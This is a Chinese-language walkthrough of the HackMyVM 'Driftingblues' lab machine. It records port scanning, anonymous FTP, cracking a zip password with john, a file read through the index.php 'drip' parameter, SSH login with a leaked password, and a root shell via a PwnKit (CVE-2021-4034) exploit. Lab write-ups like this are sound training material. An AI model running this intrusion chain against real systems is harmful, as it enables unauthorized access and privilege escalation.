HMV-Driftingblues

HMV-Driftingblues靶场复盘

端口扫描 / 信息收集

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.58.44             
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 21:02 CST
Nmap scan report for bogon (192.168.58.44)
Host is up (0.026s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.58.11
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
|   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   26.10 ms bogon (192.168.58.44)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds

开放21 22 80
先去匿名访问一下21端口

┌──(root㉿kakeru)-[~/tmp]
└─# ftp anonymous@192.168.58.44 

ftp> ls -al
229 Entering Extended Passive Mode (|||27551|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Sep 19  2021 .
drwxr-xr-x    2 0        0            4096 Sep 19  2021 ..
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||54209|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |***********************************************************************************************************|   471        2.46 MiB/s    00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (27.75 KiB/s)

发现有一个zip文件，拿到本地来看看 有密码就用john破解一下

┌──(root㉿kakeru)-[~/tmp]
└─# unzip respectmydrip.zip                 
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password: 
   skipping: respectmydrip.txt       incorrect password
  inflating: secret.zip              
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# zip2john respectmydrip.zip > hash
ver 2.0 respectmydrip.zip/respectmydrip.txt PKZIP Encr: cmplen=32, decmplen=20, crc=5C92F12B ts=96AB cs=5c92 type=0
ver 2.0 respectmydrip.zip/secret.zip is not encrypted, or stored with non-handled compression type
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# john hash                                            
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
072528035        (respectmydrip.zip/respectmydrip.txt)     
1g 0:00:01:44 DONE 3/3 (2025-03-08 21:09) 0.009575g/s 33407Kp/s 33407Kc/s 33407KC/s 072238647..078169144
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

──(root㉿kakeru)-[~/tmp]
└─# unzip respectmydrip.zip
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password: 
 extracting: respectmydrip.txt       
replace secret.zip? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: secret.zip      

┌──(root㉿kakeru)-[~/tmp]
└─# cat  respectmydrip.txt      
just focus on "drip"   

给了一个”drip”提示，然后这个secret.zip也要密码，drip不是这个secret的密码

web探测

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.58.44/
<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>  

从robots.txt中得到两个目录

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.44/robots.txt
User-agent: *
Disallow: /dripisreal.txt
Disallow: /etc/dripispowerful.html

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.44//dripisreal.txt
hello dear hacker wannabe,

go for this lyrics:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

count the n words and put them side by side then md5sum it

ie, hellohellohellohello >> md5sum hellohellohellohello

it's the password of ssh                                                                                                                                                        

按照他的说法就是把这个歌词里面有n的单词都提取出来让后排列在一起，但是我试了一下grep “n” 发现带有n的单词数量吓人，就先找别的信息了
用gobuster扫描的目录，发现首页是index.php

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.44  -x php,js,txt,jpg,png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.58.44
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,js,txt,jpg,png
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 138]
/robots.txt           (Status: 200) [Size: 78]
/.php                 (Status: 403) [Size: 278]

这个php文件会不会有什么后门呢 用wfuzz扫一下没有扫出来，但是刚才ftp提取的文件里面有说just focus on "drip" 所以用drip试试
但是我用drip输入指令和文件什么返回都没有

卡住看了下wp后，原来要读取刚才robots.txt里面给的文件

view-source:http://192.168.58.44/index.php?drip=/etc/dripispowerful.html

<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('drippin.jpg');
background-repeat: no-repeat;
}

@font-face {
    font-family: Segoe;
    src: url('segoeui.ttf');
}

.mainfo {
  text-align: center;
  border: 1px solid #000000;
  font-family: 'Segoe';
  padding: 5px;
  background-color: #ffffff;
  margin-top: 300px;
}

.emoji {
	width: 32px;
	}
</style>
password is:
imdrippinbiatch
</body>
</html>

<html>
<body>
driftingblues is hacked again so it's now called drippingblues. :D hahaha
<br>
by
<br>
travisscott & thugger
</body>
</html>

得到密码imdrippinbiatch 尝试了几个用户名，最后登录到thugger这个用户了

提权

thugger@drippingblues:~$ ls -al
total 64
drwxr-xr-x 14 thugger thugger 4096 Sep 19  2021 .
drwxr-xr-x  3 root    root    4096 Sep 18  2021 ..
-rw-------  1 thugger thugger    8 Sep 19  2021 .bash_history
drwxr-xr-x 10 thugger thugger 4096 Sep 19  2021 .cache
drwxr-xr-x 11 thugger thugger 4096 Sep 19  2021 .config
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Desktop
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Documents
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Downloads
drwxr-xr-x  3 thugger thugger 4096 Sep 19  2021 .local
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Music
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Pictures
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Public
drwx------  2 thugger thugger 4096 Sep 19  2021 .ssh
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Templates
-r-x------  1 thugger thugger   32 Sep 19  2021 user.txt
drwxr-xr-x  2 thugger thugger 4096 Sep 18  2021 Videos

这个用户的目录下面除了user.txt是有用的其他都是空文件夹。 也没有sudo命令
用linpeas.sh扫描了一下发现

-rwsr-xr-x 1 root root             31K Aug 16  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root            146K Jan 19  2021 /snap/core18/2128/usr/bin/sudo

这两个可疑的东西 但是我尝试了上面的那个漏洞没有成功

上传linux-exploit-suggester.sh扫描可疑的漏洞 发现有pwnkit

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

在github找到py脚本可以直接使用，靶机上有python3

thugger@drippingblues:~$ vi pwn.py
thugger@drippingblues:~$ python3 pwn.py
[+] Creating shared library for exploit code.
[-] GCONV_PATH=. directory already exists, continuing.
[+] Calling execve()
# id
uid=0(root) gid=1001(thugger) groups=1001(thugger)

这里其他也有很多漏洞可以提权 刚刚随便试了一个CVE-2021-3156也是可以的，github也有对应的py文件

总结

• 前面出现的信息需要甄别，这题里面有没有的信息比如secret.zip 虚假的ssh密码获取方式 但是robots.txt中的内容我没有很好的完全利用上
• 新下载了linux-exploit-suggester.sh这个工具用来查找漏洞
• 漏洞最好用py的，可以在靶机上直接运行